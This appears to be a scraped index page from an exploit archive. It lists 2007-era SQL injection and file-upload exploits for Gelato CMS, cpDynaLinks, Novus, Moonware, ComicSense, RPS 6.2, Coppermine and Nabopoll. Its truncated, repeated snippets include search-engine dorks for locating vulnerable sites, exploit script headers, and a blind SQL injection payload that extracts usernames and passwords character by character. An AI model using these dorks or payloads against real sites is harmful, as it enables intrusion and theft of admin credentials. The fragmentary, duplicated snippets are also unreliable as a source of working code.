Gelato (index.php post) Remote SQL Injection Exploit

No description provided by source. ? Gelato SQL Injection exploit Dork: powered by gelato cms Homepage: http://gelatocms.com s 0 c r a t e x msn: s0cratexatnasadotgov greetz: D.O.M and plexinium team inisetmaxexecutiontime,0; function gettext $in = fopenphp://stdin, 'r'; $text = fgets$in, 1024;...

cpdynalinks-sql.txt

!/usr/bin/perl cpDynaLinks 1.02 Remote Sql Inyection exploit download: http://www.cplinks.com/download/cpdynalinks/cpdynalinksversion102full.zip bug found by s0cratex exploit written by ka0x D.O.M TEAM 2007 d0rk: Powered by cpDynaLinks need magicquotesgpc off contact: ka0x@domlabs: perl...

novus-sql.txt

Novus - Sistema de administracion y contenido. bug: Sql Inyection. official site: http://novus.com.mx d0rk: "Powered by Novus" free: no system: asp bug found by ka0x D.O.M TEAM we: ka0x, an0de, xarnuz, s0cratex ka0x01atgmail.com tables: 1- anota.notaid 2- anota.fepublicacion 3- anota.seccionid 4-...

gelato-sql.txt

? Gelato SQL Injection exploit Dork: "powered by gelato cms" Homepage: http://gelatocms.com s 0 c r a t e x msn: s0cratexatnasadotgov greetz: D.O.M and plexinium team iniset"maxexecutiontime",0; function gettext $in = fopen"php://stdin", 'r'; $text = fgets$in, 1024; $text = trim$text; return $tex...

Gelato SQL Injection exploit

? Gelato SQL Injection exploit Dork: "powered by gelato cms" Homepage: http://gelatocms.com s 0 c r a t e x msn: s0cratexatnasadotgov greetz: D.O.M and plexinium team iniset"maxexecutiontime",0; function gettext $in = fopen"php://stdin", 'r'; $text = fgets$in, 1024; $text = trim$text; return $tex...

Gelato - 'index.php?post' SQL Injection

? Gelato SQL Injection exploit Dork: "powered by gelato cms" Homepage: http://gelatocms.com s 0 c r a t e x msn: s0cratexatnasadotgov greetz: D.O.M and plexinium team iniset"maxexecutiontime",0; function gettext $in = fopen"php://stdin", 'r'; $text = fgets$in, 1024; $text = trim$text; return $tex...

Gelato - index.php?post SQL Injection

Gelato - index.php?post SQL Injection ? Gelato SQL Injection exploit Dork: "powered by gelato cms" Homepage: http://gelatocms.com s 0 c r a t e x msn: s0cratexatnasadotgov greetz: D.O.M and plexinium team iniset"maxexecutiontime",0; function gettext $in = fopen"php://stdin", 'r'; $text = fgets$in...

moonware-multi.txt

Moonware Software Multiple Vulnerabilities by s0cratex -------- MSN: s0cratexatnasadotgov Moonware Homepage: http://dalemooney.lost-soldiers.com I. Moon Gallery ---- ------- Bug: Arbitrary file upload Dork: "Powered by: Dale Mooney Gallery" Details: The file /config/upload.php don't have any...

Comicsense 0.2 - 'index.php?epi' SQL Injection (2)

!/usr/bin/perl -w ComicSense 0.2 SQL Injection Exploit Discovered by: s0cratex Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Original Advisory: http://seclists.org/bugtraq/2007/Jun/0063.html http://milw0rm.com/exploits/4035 Vulnerable Code index.php: $sqlQuery = "SELECT...

Comicsense 0.2 (index.php epi) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications =========================================================== Comicsense 0.2 index.php epi Remote SQL Injection Exploit =========================================================== !/usr/bin/perl -w ComicSense 0.2 SQL Injection Exploit...

Comicsense 0.2 - index.php?epi SQL Injection (2)

Comicsense 0.2 - index.php?epi SQL Injection 2 !/usr/bin/perl -w ComicSense 0.2 SQL Injection Exploit Discovered by: s0cratex Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Original Advisory: http://seclists.org/bugtraq/2007/Jun/0063.html http://milw0rm.com/exploits/4035...

rps62-sql.txt

? //RPS 6.2 SQL Injection Exploit //http://www.rps-project.com/ //Need magicquotesgpc = Off; //by s0cratex //Contact: s0cratexathotmaildotcom //Salu2: rgod, 0pt1x 'n mechas. errorreporting0; iniset"maxexecutiontime",0; iniset"defaultsockettimeout",5; $host = "localhost"; $path="/rps"; $id=1; echo...

Rigter Portal System (RPS) 6.2 Remote Blind SQL Injection Exploit

No description provided by source. ? //RPS 6.2 SQL Injection Exploit //http://www.rps-project.com/ //Need magicquotesgpc = Off; //by s0cratex //Contact: s0cratexathotmaildotcom //Salu2: rgod, 0pt1x 'n mechas. errorreporting0; iniset"maxexecutiontime",0; iniset"defaultsockettimeout",5; $host =...

Rigter Portal System (RPS) 6.2 Remote Blind SQL Injection Exploit

Exploit for unknown platform in category web applications ================================================================= Rigter Portal System RPS 6.2 Remote Blind SQL Injection Exploit ================================================================= ? //RPS 6.2 SQL Injection Exploit //Need...

Coppermine Photo Gallery 1.3.x Remote Blind SQL Injection Exploit

No description provided by source. "; $j = 1; $user = ""; while!strstr$user,chr0 for$x=0;$x255;$x++ $xpl = "'' OR 1=SELECT IFASCIISUBSTRINGusername,".$j.",1=".$x.",1,0 FROM&...

coppermine-blindsql.txt

"; $j = 1; $user = ""; while!strstr$user,chr0 for$x=0;$x "; $a = 1; $pass = ""; while!strstr$pass,chr0...

Nabopoll 1.2 - result.php?surv Blind SQL Injection

Nabopoll 1.2 - result.php?surv Blind SQL Injection milw0rm.com 2007-02-21...

Nabopoll 1.2 - 'result.php?surv' Blind SQL Injection

milw0rm.com 2007-02-21...